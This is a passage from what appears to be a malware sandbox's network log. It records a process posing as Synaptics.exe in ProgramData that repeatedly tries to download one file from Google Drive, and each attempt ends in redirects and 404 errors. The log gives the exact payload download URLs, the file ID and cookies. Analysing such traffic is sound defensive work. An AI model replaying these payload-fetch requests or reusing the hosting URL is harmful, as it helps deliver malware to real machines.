'nonce-V25-vr9r3aTDzQOl-HpUnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.10	49985	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:42 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:42 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:42 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-bzn1kf6VeUphZVaPPY-7Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.10	49996	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:43 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:43 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:43 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-x6T0i6PBPz5iE9T5a4Km6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.10	49995	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:43 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:44 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7BZvxIr000ac4oRBYSqIfjdgwTQcGlMrhiR_ppJDduvYd85x_WVcAMYunfsb84AyVB Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:43 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-KH4j_jFQVksWb42p8BzpiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:44 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:44 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 2d 4f 4e 63 32 62 33 55 4b 6e 43 4d 79 69 44 56 6e 5f 36 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="f-ONc2b3UKnCMyiDVn_6Vg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:44 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.10	49994	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:43 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:44 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7nEZv3EeUA8RxBAEkHdahb-SPNFRyZtxvkCjG501AD6nNpy46LNRrTrFqKprUvO2Ly Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:44 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-DgR8KjNPMrrfFrBC-wzIgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:44 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:44 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 2d 61 5a 41 77 4e 66 46 79 57 38 37 64 5a 39 4f 6b 6d 31 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="L-aZAwNfFyW87dZ9Okm1NA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:44 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.10	49993	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:43 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:43 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:43 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-W6pyrpONQiQHW5QYnLsAFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.10	50004	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:44 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN
2024-12-30 10:25:44 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:44 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-N0-tvKLjmr1sdUdpwEiIwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.10	50005	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:44 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN
2024-12-30 10:25:45 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:44 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-VreoxDIGflgQkmFhrcG_Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.10	50006	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:44 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:45 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6uOR0ZAOCtdAS0LniFhZHDrTbpPSXp7NYr92exU2p90EV8Mi9LnzJOPbfnlLuVHctC Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:44 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-oQ7XohV5ZYVJ_zZ6SJLZ2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:45 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:45 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 48 42 54 35 45 6c 73 35 67 36 45 33 55 57 77 36 72 41 36 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="GHBT5Els5g6E3UWw6rA67A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:45 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.10	50012	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:44 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:45 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4aMObmuy-kLXacJXnNGn1r_MTEtzOHREfFdIWqL_cM8Q5bVfNKXTTd1pP2nAUgn5Dfu5SRSMk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:45 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-q5KZx4rxCzDeZB-O1Z23RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, 